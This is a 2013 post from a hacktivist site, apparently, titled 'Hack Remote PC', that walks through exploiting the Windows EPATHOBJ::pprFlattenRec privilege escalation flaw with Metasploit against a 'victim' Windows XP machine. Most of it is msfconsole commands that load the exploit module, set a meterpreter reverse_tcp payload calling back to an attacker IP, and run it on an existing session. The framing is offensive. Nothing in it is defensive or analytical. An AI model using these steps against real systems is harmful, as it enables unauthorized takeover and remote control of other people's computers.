CyberGuerrilla 2013
 Vol.3--No.2013 | 5 Users Online
Sunday,Sep 15,2019 
By ro0ted avatar | December 15, 2013 - 11:41 | Posted in /b/ | Comments Off on #ro0ted Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation

#ro0ted Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation

This module exploits vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.

Exploit Targets

Windows XP SP 3

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

First Hack the Victim PC Using Metaspolit

Open Kali Linux terminal type??msfconsole

Screenshot from 2013-11-15 04:09:31

Now type use use exploit/windows/local/ppr_flatten_rec

msf exploit (ppr_flatten_rec)>set payload windows/meterpreter/reverse_tcp

msf exploit (ppr_flatten_rec)>set lhost 192.168.1.103 (IP of Local Host)

msf exploit (ppr_flatten_rec)>set session 1

msf exploit (ppr_flatten_rec)>exploit

Screenshot from 2013-12-15 02:38:57Screenshot from 2013-12-15 02:39:58

BKhI3ZeCcAAfGET

(Visited 8 times, 1 visits today)


  • You can follow any responses to this entry through the RSS 2.0 feed.
  • Both comments and pings are currently closed.

Comments are closed.

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.

nonymous. Whoever you are, we are ungovernable!
> =[]= This site is run by cyberguerrilla, your friendly anonymous autonomous tech collective since 2010 =[]= This the past that can NOT be changed! <